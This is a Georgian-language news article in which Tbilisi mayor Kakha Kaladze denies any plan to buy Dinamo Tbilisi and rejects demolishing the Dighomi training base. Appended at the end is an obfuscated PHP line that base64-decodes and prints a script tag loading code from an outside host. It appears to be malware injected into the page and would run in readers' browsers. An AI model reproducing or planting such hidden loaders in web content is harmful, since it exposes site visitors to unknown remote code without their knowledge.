celsiusi
ავერსი შნაიდერი

დიღმის საწვრთნელი ბაზა არის ისტორია, რომელიც უნდა დარჩეს დედაქალაქს და ჩვენს ქვეყანას, – ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ ჟურნალისტებთან „დინამო თბილისის“ პრეზიდენტის, რომან ფიფიას განცხადების კომენტირებისას ისაუბრა.

როგორც მან აღნიშნა, კლუბ „თბილისის დინამოს“ შეძენის არც ინტერესი აქვს და არც შესაძლებლობა.

„„დინამოს” გულშემატკივარი ყოველთვის ვიყავი და ჩემი წარმატება დაიწყო ამ კლუბიდან. მე არ მაქვს ინტერესი, რომ „დინამო თბილისი“ შევიძინო, უბრალოდ, ამის ფინანსური შესაძლებლობა არ მაქვს. შეიძლება, რაღაც იყიდო, მაგრამ ამას უდიდესი პასუხისმგებლობა მოსდევს, რომ იყოს გამართული. მე, ჩემი ხასიათიდან გამომდინარე, თუ რაღაცას ხელს ვკიდებ, მინდა, რომ მაქსიმალურად საუკეთესოდ გაკეთდეს და საუკეთესო შედეგები მივიღო. ამიტომ ისეთ ნაბიჯს არ გადავდგამ, რომელიც შეიძლება, პრობლემური იყოს ან ვერ გაკეთდეს. არანაირი მოლაპარაკება არ ყოფილა. მარტო შეძენა ხომ არ არის. ამას უამრავი თანხის ინვესტიცია სჭირდება, რომ ყველაფერი გამართული იყოს. მე მხედველობაში მაქვს, რომ ისეთი გუნდი გაკეთდეს, რომელიც ჩემპიონთა ლიგაზე ითამაშებს. რა მდგომარეობაშიც არის დღეს „თბილისის დინამო“, მე, უბრალოდ, ამას ვერ და არ გავაკეთებ, რომ გუნდი იმავე მდგომარეობაში მყავდეს. მე არ მაქვს ამის შესაძლებლობა“, – განაცხადა კახა კალაძემ.

მან ასევე ისაუბრა იმ განცხადებების შესახებაც, რომელიც დიღმის საწვრთნელი ბაზის დანგრევის შესახებ გაკეთდა და აღნიშნა, რომ ეს მისთვის კატეგორიულად მიუღებელია.

„საუბარი იყო დიღმის საწვრთნელი ბაზის დანგრევაზე და კორპუსების მშენებლობაზე. ეს, უბრალოდ, გამაოგნებელია. მე მოვისმინე განცხადება სოციალურ ქსელში. ვოვა გუცაევს უდიდეს პატივს ვცემ თავისი წარსულიდან გამომდინარე, უდიდესი ფეხბურთელი იყო. უბრალოდ, ეს დამოკიდებულება, რომ დიღმის საწვრთნელი ბაზა დავანგრიოთ, რომელიც ჩვენი ქვეყნის ისტორიაა და რომელსაც შვილივით გაფრთხილება სჭირდება, აბსოლუტურად გაუგებარია. მე პირდაპირ ვიტყვი, ვიდრე დედაქალაქის მერი ვარ, არ იქნება მიღებული ისეთი გადაწყვეტილება, რომ ის სიამაყე, რაც გააჩნია ქართულ ფეხბურთს დიღმის საწვრთნელი ბაზის სახით, რომელიც კულტურული მემკვიდრეობის ძეგლია, დაინგრეს. ამას არასდროს გავაკეთებ. ამ ადგილმა უამრავი უნიჭიერესი თაობა გამოზარდა. მისი დანგრევა კატეგორიულად მიუღებელია. არავის ვურჩევ, რომ ამ ბაზაზე ხელი ასწიოს და მისი დანგრევა მოახდინოს. თუ ვინმეს ახალი ბაზის აშენება უნდა, ამაში ვინ ზღუდავს? უამრავი ტერიტორია და შესაძლებლობაა, სადაც ამის გაკეთება შეიძლება. ეს ბაზა კი არის ისტორია, რომელიც უნდა დარჩეს დედაქალაქს და ჩვენს ქვეყანას“, – აღნიშნა თბილისის მერმა.

281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");